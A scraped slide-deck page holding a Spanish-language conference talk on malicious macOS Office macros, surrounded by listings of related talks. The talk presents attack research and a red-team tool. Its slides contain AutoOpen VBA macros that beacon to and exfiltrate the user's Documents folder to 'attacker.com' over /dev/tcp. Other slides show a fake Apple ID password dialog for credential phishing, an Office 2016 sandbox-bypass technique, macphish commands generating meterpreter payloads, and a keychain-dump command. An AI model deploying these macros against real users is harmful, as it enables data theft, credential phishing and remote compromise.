El porqué está fallando tu programa de seguridad informática por Paulino Cald...
El porqué está fallando tu programa de seguridad informática por Paulino Cald...El porqué está fallando tu programa de seguridad informática por Paulino Cald...
El porqué está fallando tu programa de seguridad informática por Paulino Cald...
 
Pwning corporate networks in a single day by Paulino Calderon Pale
Pwning corporate networks in a single day by Paulino Calderon PalePwning corporate networks in a single day by Paulino Calderon Pale
Pwning corporate networks in a single day by Paulino Calderon Pale
 
CPMX7 Pwneando redes informáticas por Paulino Calderon
CPMX7 Pwneando redes informáticas por Paulino CalderonCPMX7 Pwneando redes informáticas por Paulino Calderon
CPMX7 Pwneando redes informáticas por Paulino Calderon
 
Explotación práctica de señales de radio por Luis Colunga
Explotación práctica de señales de radio por Luis ColungaExplotación práctica de señales de radio por Luis Colunga
Explotación práctica de señales de radio por Luis Colunga
 
OSINT vs CIBERCRIMEN por nickops
OSINT vs CIBERCRIMEN por nickopsOSINT vs CIBERCRIMEN por nickops
OSINT vs CIBERCRIMEN por nickops
 
Recuperacion de defaces con versionador Git por Alevsk
Recuperacion de defaces con versionador Git por Alevsk Recuperacion de defaces con versionador Git por Alevsk
Recuperacion de defaces con versionador Git por Alevsk
 
Seguridad en Bitcoin por Luis Daniel Beltran
Seguridad en Bitcoin por Luis Daniel BeltranSeguridad en Bitcoin por Luis Daniel Beltran
Seguridad en Bitcoin por Luis Daniel Beltran
 
CPMX5 - Las nuevas generaciones de redes por Luis Colunga
CPMX5 - Las nuevas generaciones de redes por Luis ColungaCPMX5 - Las nuevas generaciones de redes por Luis Colunga
CPMX5 - Las nuevas generaciones de redes por Luis Colunga
 
CPMX5 - (IN)seguridad en infraestructura tecnológica por Paulino Calderón
CPMX5 - (IN)seguridad en infraestructura tecnológica por Paulino CalderónCPMX5 - (IN)seguridad en infraestructura tecnológica por Paulino Calderón
CPMX5 - (IN)seguridad en infraestructura tecnológica por Paulino Calderón
 
Drive by subdomain router pharming (2012)
Drive by subdomain router pharming (2012)Drive by subdomain router pharming (2012)
Drive by subdomain router pharming (2012)
 
Hardware para hacking (2011)
Hardware para hacking (2011)Hardware para hacking (2011)
Hardware para hacking (2011)
 
Mac2wepkey (2011)
Mac2wepkey (2011)Mac2wepkey (2011)
Mac2wepkey (2011)
 
Teensy para pentesters y locos (2010)
Teensy para pentesters y locos (2010)Teensy para pentesters y locos (2010)
Teensy para pentesters y locos (2010)
 
Desarrollo de rootkits en Linux [GuadalajaraCON 2013]
Desarrollo de rootkits en Linux [GuadalajaraCON 2013]Desarrollo de rootkits en Linux [GuadalajaraCON 2013]
Desarrollo de rootkits en Linux [GuadalajaraCON 2013]
 
Vulnerabilidades en tecnologías NFC y RFID [GuadalajaraCON 2013]
Vulnerabilidades en tecnologías NFC y RFID [GuadalajaraCON 2013]Vulnerabilidades en tecnologías NFC y RFID [GuadalajaraCON 2013]
Vulnerabilidades en tecnologías NFC y RFID [GuadalajaraCON 2013]
 
Desarrollo de exploit para infraestructura crítica [GuadalajaraCON 2013]
Desarrollo de exploit para infraestructura crítica [GuadalajaraCON 2013]Desarrollo de exploit para infraestructura crítica [GuadalajaraCON 2013]
Desarrollo de exploit para infraestructura crítica [GuadalajaraCON 2013]
 

Último

LA ETICA DEL UTILITARISMO DE JEREMY BENTHAM
LA ETICA DEL UTILITARISMO DE JEREMY BENTHAMLA ETICA DEL UTILITARISMO DE JEREMY BENTHAM
LA ETICA DEL UTILITARISMO DE JEREMY BENTHAMalejandroortizm
 
GRUPO 5 Software en el campo de la salud.pptx
GRUPO 5 Software en el campo de la salud.pptxGRUPO 5 Software en el campo de la salud.pptx
GRUPO 5 Software en el campo de la salud.pptxNicolas Villarroel
 
Fisica General.pdf ESCUELA D QUIMICA E INGENIERIA
Fisica General.pdf ESCUELA D QUIMICA E INGENIERIAFisica General.pdf ESCUELA D QUIMICA E INGENIERIA
Fisica General.pdf ESCUELA D QUIMICA E INGENIERIAcoloncopias5
 
ChatGPT Inteligencia artificial, funciones, limitaciones y ventajas.
ChatGPT Inteligencia artificial, funciones, limitaciones y ventajas.ChatGPT Inteligencia artificial, funciones, limitaciones y ventajas.
ChatGPT Inteligencia artificial, funciones, limitaciones y ventajas.Aldo Fernandez
 
Software y servicios de internet mapa conceptual.pdf
Software y servicios de internet mapa conceptual.pdfSoftware y servicios de internet mapa conceptual.pdf
Software y servicios de internet mapa conceptual.pdfDanielaEspitiaHerrer
 
que es Planimetría definición importancia en topografia.pptx
que es Planimetría definición importancia en topografia.pptxque es Planimetría definición importancia en topografia.pptx
que es Planimetría definición importancia en topografia.pptxmrzreyes12
 
CamposGarcia_MariaMagdalena_M1S3AI6.pptx
CamposGarcia_MariaMagdalena_M1S3AI6.pptxCamposGarcia_MariaMagdalena_M1S3AI6.pptx
CamposGarcia_MariaMagdalena_M1S3AI6.pptx241518192
 
rodriguez_DelAngel_MariaGPE_M1S3AL6.pptx
rodriguez_DelAngel_MariaGPE_M1S3AL6.pptxrodriguez_DelAngel_MariaGPE_M1S3AL6.pptx
rodriguez_DelAngel_MariaGPE_M1S3AL6.pptxssuser61dda7
 
Practica guiada Menu_ tecnología (Tic's)
Practica guiada Menu_ tecnología (Tic's)Practica guiada Menu_ tecnología (Tic's)
Practica guiada Menu_ tecnología (Tic's)BrianaFrancisco
 
GRUPO 10 SOFTWARE DE EL CAMPO DE LA SAULD
GRUPO 10 SOFTWARE DE EL CAMPO DE LA SAULDGRUPO 10 SOFTWARE DE EL CAMPO DE LA SAULD
GRUPO 10 SOFTWARE DE EL CAMPO DE LA SAULDLeslie Villar
 
11º Anuncio Nominados Finalistas Premios #LatamDigital 2024 by Interlat Vers...
11º Anuncio Nominados Finalistas Premios #LatamDigital 2024 by Interlat  Vers...11º Anuncio Nominados Finalistas Premios #LatamDigital 2024 by Interlat  Vers...
11º Anuncio Nominados Finalistas Premios #LatamDigital 2024 by Interlat Vers...#LatamDigital
 
2º SOY LECTOR PART 2- MD EDUCATIVO (6).pdf
2º SOY LECTOR PART 2- MD  EDUCATIVO (6).pdf2º SOY LECTOR PART 2- MD  EDUCATIVO (6).pdf
2º SOY LECTOR PART 2- MD EDUCATIVO (6).pdfFernandaHernandez312615
 
El uso de las tic en la vida continúa , ambiente positivo y negativo.
El uso de las tic  en la vida continúa , ambiente positivo y negativo.El uso de las tic  en la vida continúa , ambiente positivo y negativo.
El uso de las tic en la vida continúa , ambiente positivo y negativo.ayalayenifer617
 
Medios Digitales Teorías y Metodologías de Análisis.pptx
Medios Digitales Teorías y Metodologías de Análisis.pptxMedios Digitales Teorías y Metodologías de Análisis.pptx
Medios Digitales Teorías y Metodologías de Análisis.pptxUniversidad de Bielefeld
 
Tema 1 - Fundamentos de gestión contable.pptx
Tema 1 - Fundamentos de gestión contable.pptxTema 1 - Fundamentos de gestión contable.pptx
Tema 1 - Fundamentos de gestión contable.pptxchinojosa17
 
TALLER DE ANALISIS SOLUCION DE TECNOLOGIA
TALLER DE ANALISIS SOLUCION DE TECNOLOGIATALLER DE ANALISIS SOLUCION DE TECNOLOGIA
TALLER DE ANALISIS SOLUCION DE TECNOLOGIAobandopaula444
 
FLUIDEZ-Teatro-Leido-4to-Grado-El-leon-y-el-raton- (1).pdf
FLUIDEZ-Teatro-Leido-4to-Grado-El-leon-y-el-raton- (1).pdfFLUIDEZ-Teatro-Leido-4to-Grado-El-leon-y-el-raton- (1).pdf
FLUIDEZ-Teatro-Leido-4to-Grado-El-leon-y-el-raton- (1).pdfYuriFuentesMartinez2
 

Último (17)

LA ETICA DEL UTILITARISMO DE JEREMY BENTHAM
LA ETICA DEL UTILITARISMO DE JEREMY BENTHAMLA ETICA DEL UTILITARISMO DE JEREMY BENTHAM
LA ETICA DEL UTILITARISMO DE JEREMY BENTHAM
 
GRUPO 5 Software en el campo de la salud.pptx
GRUPO 5 Software en el campo de la salud.pptxGRUPO 5 Software en el campo de la salud.pptx
GRUPO 5 Software en el campo de la salud.pptx
 
Fisica General.pdf ESCUELA D QUIMICA E INGENIERIA
Fisica General.pdf ESCUELA D QUIMICA E INGENIERIAFisica General.pdf ESCUELA D QUIMICA E INGENIERIA
Fisica General.pdf ESCUELA D QUIMICA E INGENIERIA
 
ChatGPT Inteligencia artificial, funciones, limitaciones y ventajas.
ChatGPT Inteligencia artificial, funciones, limitaciones y ventajas.ChatGPT Inteligencia artificial, funciones, limitaciones y ventajas.
ChatGPT Inteligencia artificial, funciones, limitaciones y ventajas.
 
Software y servicios de internet mapa conceptual.pdf
Software y servicios de internet mapa conceptual.pdfSoftware y servicios de internet mapa conceptual.pdf
Software y servicios de internet mapa conceptual.pdf
 
que es Planimetría definición importancia en topografia.pptx
que es Planimetría definición importancia en topografia.pptxque es Planimetría definición importancia en topografia.pptx
que es Planimetría definición importancia en topografia.pptx
 
CamposGarcia_MariaMagdalena_M1S3AI6.pptx
CamposGarcia_MariaMagdalena_M1S3AI6.pptxCamposGarcia_MariaMagdalena_M1S3AI6.pptx
CamposGarcia_MariaMagdalena_M1S3AI6.pptx
 
rodriguez_DelAngel_MariaGPE_M1S3AL6.pptx
rodriguez_DelAngel_MariaGPE_M1S3AL6.pptxrodriguez_DelAngel_MariaGPE_M1S3AL6.pptx
rodriguez_DelAngel_MariaGPE_M1S3AL6.pptx
 
Practica guiada Menu_ tecnología (Tic's)
Practica guiada Menu_ tecnología (Tic's)Practica guiada Menu_ tecnología (Tic's)
Practica guiada Menu_ tecnología (Tic's)
 
GRUPO 10 SOFTWARE DE EL CAMPO DE LA SAULD
GRUPO 10 SOFTWARE DE EL CAMPO DE LA SAULDGRUPO 10 SOFTWARE DE EL CAMPO DE LA SAULD
GRUPO 10 SOFTWARE DE EL CAMPO DE LA SAULD
 
11º Anuncio Nominados Finalistas Premios #LatamDigital 2024 by Interlat Vers...
11º Anuncio Nominados Finalistas Premios #LatamDigital 2024 by Interlat  Vers...11º Anuncio Nominados Finalistas Premios #LatamDigital 2024 by Interlat  Vers...
11º Anuncio Nominados Finalistas Premios #LatamDigital 2024 by Interlat Vers...
 
2º SOY LECTOR PART 2- MD EDUCATIVO (6).pdf
2º SOY LECTOR PART 2- MD  EDUCATIVO (6).pdf2º SOY LECTOR PART 2- MD  EDUCATIVO (6).pdf
2º SOY LECTOR PART 2- MD EDUCATIVO (6).pdf
 
El uso de las tic en la vida continúa , ambiente positivo y negativo.
El uso de las tic  en la vida continúa , ambiente positivo y negativo.El uso de las tic  en la vida continúa , ambiente positivo y negativo.
El uso de las tic en la vida continúa , ambiente positivo y negativo.
 
Medios Digitales Teorías y Metodologías de Análisis.pptx
Medios Digitales Teorías y Metodologías de Análisis.pptxMedios Digitales Teorías y Metodologías de Análisis.pptx
Medios Digitales Teorías y Metodologías de Análisis.pptx
 
Tema 1 - Fundamentos de gestión contable.pptx
Tema 1 - Fundamentos de gestión contable.pptxTema 1 - Fundamentos de gestión contable.pptx
Tema 1 - Fundamentos de gestión contable.pptx
 
TALLER DE ANALISIS SOLUCION DE TECNOLOGIA
TALLER DE ANALISIS SOLUCION DE TECNOLOGIATALLER DE ANALISIS SOLUCION DE TECNOLOGIA
TALLER DE ANALISIS SOLUCION DE TECNOLOGIA
 
FLUIDEZ-Teatro-Leido-4to-Grado-El-leon-y-el-raton- (1).pdf
FLUIDEZ-Teatro-Leido-4to-Grado-El-leon-y-el-raton- (1).pdfFLUIDEZ-Teatro-Leido-4to-Grado-El-leon-y-el-raton- (1).pdf
FLUIDEZ-Teatro-Leido-4to-Grado-El-leon-y-el-raton- (1).pdf
 

Malicious OSX Macros Return - New Attack Vectors for Office 2016

  • 1.
  • 2. Old fox, new tricks – Malicious OSX/MacOS macros are back Paulino Calderon <@calderpwn> calderon@websec.mx - http://calderonpale.com - http://websec.mx
  • 3. $whoami • Pruebas de Penetración, Análisis de Vulnerabilidades, Revisión de Código Fuente y Pruebas de Ingeniería Social en Websec (http://websec.mx/). • Autor de libros con PacktPub (https://www.packtpub.com) y cursos en línea con Pluralsight (https://www.pluralsight.com). • Me gusta desarrollar software libre, experimentar con tecnologías nuevas y buscar vulnerabilidades en software. • Chapter leader de OWASP Riviera Maya
  • 5. ¿De qué vamos a hablar hoy? • Ataques con macros maliciosos para Mac (OSX/MacOS) ”in the wild”. • Vectores de ataques en Office 2011. • Nuevos vectores de ataque contra Office 2016 que funcionan a pesar de las protecciones del sandbox. • Macphish – Nueva herramienta para generar macros para Mac para pruebas de ingeniería social.
  • 6.
  • 7. U.S. Allies and Rivals Digest Trump's Victory – Carnegie Endowment for International Peace.docm • Descubierto en Febrero 2017. • Al ejecutarse el macro malicioso: • Verificaba que Little Snitch no estuviera ejecutándose. • Descargaba Stager de EmPyre. • Atacantes tenían acceso a todos los módulos de EmPyre. • Patrick Wardle publicó un análisis en su sitio web. -> https://objective-see.com/blog/blog_0x17.html • Interesante pero este ataque no funciona si el usuario usa Office 2016.
  • 8.
  • 9. Un poco de historia… • Office 2008 for Mac mitigaba los macros maliciosos totalmente… al no soportar VBA. • En Office 2011 for Mac vuelven a soportar VBA macros. • Debido a los serios problemas de seguridad, Office 2016 for Mac ahora se ejecuta en un App Sandbox. • Aunque los usuarios ejecuten el macro, ¡ya no podemos acceder a archivos de usuario/sistema! … ¿O sí?
  • 10. Versiones de Office en uso en la actualidad Office 2016Office 2011
  • 11.
  • 12. Office 2011 vs Office 2016
  • 13. Macros en OSX/MacOS • Deben guardarse en un archivo .docm. • Requieren interacción del usuario. • No se puede configurar Office para que automáticamente no ejecute macros: • O ejecuta automáticamente todos los macros. • O te pregunta cada vez que abres un macro.
  • 14. Macros multiplataforma •Condicionales en Office nos permiten crear macros multiplataforma y detectar la versión de Office. •”If Mac” disponible desde Office 2011. •MAC_OFFICE_VERSION desde Office 2016.
  • 16. Ejecución de código malicioso con System() • En OSX/MacOS es posible ejecutar código malicioso utilizando la función System() de libc.dylib.
  • 17.
  • 18. Problemas utilizando System() • Está técnica presenta ciertas desventajas: • Requiere soportar ambas versiones (32/64 bits). • No funciona en todos los sistemas.
  • 19. Abusando Macscript • La función de VBA Macscript() fue diseñada para ejecutar scripts Applescript en documentos de Mac. • Deprecada pero aún funciona en Office 2016. • Office 2016 requiere que los scripts sean colocados en una carpeta específica. Esto principalmente para evitar que macros descarguen scripts adicionales y los ejecuten. • Sin embargo, es posible abusar Macscript para ejecutar binarios del sistema. • Ojo: No todos los binarios son permitidos.
  • 20. Ejecutando binarios con Macscript Sub AutoOpen() MacScript ("do shell script ""<binary>"" ") End Sub
  • 21. No todos los binarios son iguales • Office 2016 no permite la ejecución de cualquier binario. Sin embargo, podemos invocar: • Utilidades: curl, tar, xxd, ping, nslookup y osascript. • Interpretes de programación: Python, Ruby, Perl. • Si el binario no está permitido, el sistema regresa este error:
  • 22. Abusando utilidades de sistema Phone Home Utilidades clásicas como ping o curl pueden ser utilizadas como beacons de notificación. Sub AutoOpen() MacScript ("do shell script ""ping -c 1 attacker.com"" ") End Sub
  • 23. Abusando utilidades de sistema Exfiltrando datos de usuario Además tenemos acceso a sockets directamente: /dev/tcp/atacante.com/443 Entonces también podemos comprimir la carpeta de Documentos de usuario y enviarnosla: Sub AutoOpen() MacScript ("do shell script ""tar zcf - ~/Documents | xxd -p >/dev/tcp/attacker.com/443"" ") End Sub
  • 24. Abusando osascript • Osascript es una utilidad disponible en todas las Macs que sirve para ejecutar scripts en Applescript. • A pesar de que eventos de sistema están bloqueados, tenemos acceso a funcionalidad para crear diálogos, acceder al portapapeles y obtener información del sistema.
  • 25. Phishing de credenciales con osascript Podemos utilizar diálogos para engañar a usuarios a que introduzcan sus credenciales y las enviamos utilizando alguna de las técnicas descritas anteriormente.
  • 26. Phishing de credenciales con Macscript MacScript("do shell script ""/usr/bin/osascript -e 'display dialog ""Microsoft Word requiere de tu contraseña de tu Apple ID para descifrar el archivo"" & return & return default answer """" with icon file ""Applications:Utilities:Keychain Access.app:Contents:Resources:AppIcon.icns"" with hidden answer with title ""Microsoft Word""'""")
  • 28. Phishing de credenciales con osascript • Funciona en Office 2011/2016. • Localmente también puede ser ejecutado: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html • Ahora también implementado en otras herramientas: • Bash Bunny https://github.com/hak5/bashbunny- payloads/tree/master/payloads/library/phishing/MacPhish • EmPyre https://medium.com/@malcomvetter/multi-platform-macro- phishing-payloads-3b688e8eff68
  • 29. Phishing de credenciales con osascript • Se puede personalizar los diálogos con íconos de aplicaciones en el sistema. • Applications:Utilities:Keychain Access.app:Contents:Resources:AppIcon.icns
  • 30. Abusando de los interpretes de lenguajes de programación Podemos ejecutar código utilizando interpretes de lenguajes de programación (Python/Ruby/Perl): Sub AutoOpen() MacScript ("do shell script ""python -c <payload>"" ") End Sub
  • 31. Abusando de los interpretes de lenguajes de programación
  • 33. Atacando Office 2011 for Mac Persistencia cronjob Dylib-hijack Launch daemon Login hook Exfiltración Curl/wget Tar/xxd TCP sockets C&C EmPyre Meterpreter Phishing osascript VBA
  • 34. Macros para Office 2016 • El sandbox de Office 2016 bloquea el acceso a cualquier recurso no definido en las políticas de seguridad. • Aunque los usuarios habiliten la ejecución de macros, la mayoría de malware no va a funcionar en Office 2016. • No se conocían vectores de ataque que funcionaran contra Office 2016.
  • 35. El sandbox de Office 2016 ¿Qué podemos hacer si nos enfrentamos a usuarios con Office 2016?
  • 36. Abusando de GrantAccessToMultipleFiles • Office 2016 introdujo un par de funciones nuevas entre ellas GrantAccessToMultipleFiles(). • GrantAccessToMultipleFiles recibe un arreglo de archivos en el sistema y solicita permisos de acceso. • ¡La documentación no dice nada de que carpetas también son soportadas! ¿Para qué solicitar individualmente acceso a archivos si le podemos pedir acceso a toda la carpeta? • One shot: Solo tenemos una oportunidad porque la selección del usuario es guardada para siempre. • Esto tiene muchas implicaciones de las cuales hablaremos más adelante.
  • 38. Abusando de GrantAccessToMultipleFiles Sub AutoOpen() GrantAccessToMultipleFiles(”/Users/<usuario>/Documents”) MacScript ("do shell script ""python -c <payload>"" ") End Sub
  • 40. Abusando GrantAccessToMultipleFiles Permisos globales Debido a que el dialogo se presenta una sola vez y los permisos son asignados para siempre: • Si el usuario otorga los permisos, cualquier macro que se ejecute en el sistema tendrá acceso a esos archivos. Si los usuarios ya habían permitido a un macro legitimo acceder a estos archivos, nuestro macro malicioso también tendría acceso a esos archivos.
  • 42. Abusando GrantAccessToMultipleFiles Denegación de Servicio Permanente (DoS) • Si el usuario no otorga los permisos, macros legítimos no podrán acceder a esos archivos posteriormente. • No existe una interfaz para administrar estos permisos. La respuesta de la primera petición se usa para siempre. • Posible Denegación de Servicio permanente.
  • 43. Preparando los payloads maliciosos • Payload script en Applescript debe ser escapado para ejecutarse inline a través de osascript. Debemos considerar VBA escaping también. • GrantAccessToMultipleFiles requiere saber la ruta completa al directorio del usuario objetivo. (Cambia de objetivo a objetivo) • La ruta también la podemos obtener abusando de osascript
  • 44. Macphish – Generador de macros maliciosos para pruebas de ingeniería social https://github.com/cldrn/macphish
  • 45. Macphish • Genera scripts en Applescript para pruebas de ingeniería social. • Plantillas de macros multiplataforma. • Nombres de funciones aleatorios. • Payloads de meterpreter y Empyre (*). • Configuración automática de entorno de usuario. https://github.com/cldrn/macphish
  • 46. Macphish - Beacon • Payload no malicioso que simplemente envía señal a casa sobre su ejecución. (”Phone home”) • Útil para estadísticas sobre ejecución de macros. • Funciona en Office 2011 y Office 2016. https://github.com/cldrn/macphish
  • 47. $./macphish.py –a beacon –lh <host> https://github.com/cldrn/macphish
  • 48. Macphish - Creds • Payload para intentar obtener credenciales locales de usuarios. • Utiliza funcionalidad de diálogos de osascript para realizar el ataque de phishing. • Funciona en Office 2011 y Office 2016. https://github.com/cldrn/macphish
  • 49. $./macphish.py –a creds -m –lh <host> https://github.com/cldrn/macphish
  • 50. Macphish - Meterpreter • Payload para obtener shell de meterpreter en víctimas. • Utiliza payloads en python. • Funciona en Office 2011 sin restricciones. • Office 2016 quedamos dentro del sandbox -> https://github.com/cldrn/macphish
  • 51. $./macphish.py –a meterpreter –lh <host> -lp <port> -m https://github.com/cldrn/macphish
  • 52. Macphish – Meterpreter c/ GrantAccessToMultipleFiles() • Payload para solicitar permisos a los Documentos de usuarios antes de ejecutar una shell de meterpreter. • En Office 2016 saltamos el sandbox si: • La víctima autoriza (o autorizó a otro archivo) el acceso a los documentos. • El documento se encuentra dentro de la ruta que solicita. (*) https://github.com/cldrn/macphish
  • 53. $./macphish.py –a meterpreter-grant –lh <host> -lp <port> -m https://github.com/cldrn/macphish
  • 55. Ideas adicionales • Automatizar la persistencia. • Elevación de privilegios a través de vulnerabilidades del sistema. • Dumpeo de contraseñas a través del keychain. • MacScript("do shell script ""security dump-keychain -d login.keychain"" ")
  • 56. Ligas • Documentación de macphish https://github.com/cldrn/macphish/wiki • Websec: http://websec.mx/blog/ver/mac-macros-y-macphish • App Sandbox: https://developer.apple.com/library/content/documentation/Security/Conceptual/AppSandbox DesignGuide/AboutAppSandbox/AboutAppSandbox.html • VBA improvements in Office 2016: https://dev.office.com/blogs/VBA-improvements-in-Office-2016 • Credential phishing in Empyre: https://medium.com/@malcomvetter/multi-platform-macro-phishing-payloads- 3b688e8eff68
  • 57. ¡Gracias! ¿Preguntas? Paulino Calderon <@calderpwn> calderon@websec.mx - http://calderonpale.com - http://websec.mx

Notas do Editor

  1. Es fácil detectar las firmas para cargar libc.
  2. Verifica que office 2011 tenga el mismo blacklist.
  3. Verifica que office 2011 tenga el mismo blacklist.
  4. Verifica que office 2011 tenga el mismo blacklist.
  5. Acceso a recursos que no fueron explicitamente listados en las definiciones del proyecto son rechazados.